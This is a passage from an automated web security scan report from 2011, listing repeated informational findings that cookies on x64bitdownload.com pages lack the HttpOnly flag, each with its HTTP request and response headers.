Content-Length: 32021
Connection: close
Set-Cookie: TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
Set-Cookie: TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
Set-Cookie: TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
Set-Cookie: B2CSESSIONID=m83KN2JZpgQXGw!356831932; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=3531123409; path=/
Set-Cookie: DYN_USER_CONFIRM=2afae30a32d18177a2afef4e6b409767; path=/
Set-Cookie: ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=1776406919.25115.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html lang="en">
   <head>
   <title>AT&T Reuse & Recycle - Wireless from AT&T </title
...[SNIP]...

14.816. http://www.x64bitdownload.com/64-bit-archive-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-archive-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-archive-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93426


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.817. http://www.x64bitdownload.com/64-bit-assembling-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-assembling-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-assembling-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.818. http://www.x64bitdownload.com/64-bit-atom-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-atom-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-atom-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.819. http://www.x64bitdownload.com/64-bit-audio-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-audio-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-audio-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.820. http://www.x64bitdownload.com/64-bit-automatic-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-automatic-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-automatic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.821. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-autoposter-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-autoposter-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.822. http://www.x64bitdownload.com/64-bit-binaries-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binaries-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-binaries-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.823. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-binary-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.824. http://www.x64bitdownload.com/64-bit-binary-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-binary-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.825. http://www.x64bitdownload.com/64-bit-board-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-board-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-board-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.826. http://www.x64bitdownload.com/64-bit-boards-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-boards-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-boards-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.827. http://www.x64bitdownload.com/64-bit-client-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-client-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.828. http://www.x64bitdownload.com/64-bit-commander-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-commander-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-commander-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.829. http://www.x64bitdownload.com/64-bit-community-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-community-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-community-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.830. http://www.x64bitdownload.com/64-bit-complex-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-complex-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-complex-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:34 GMT
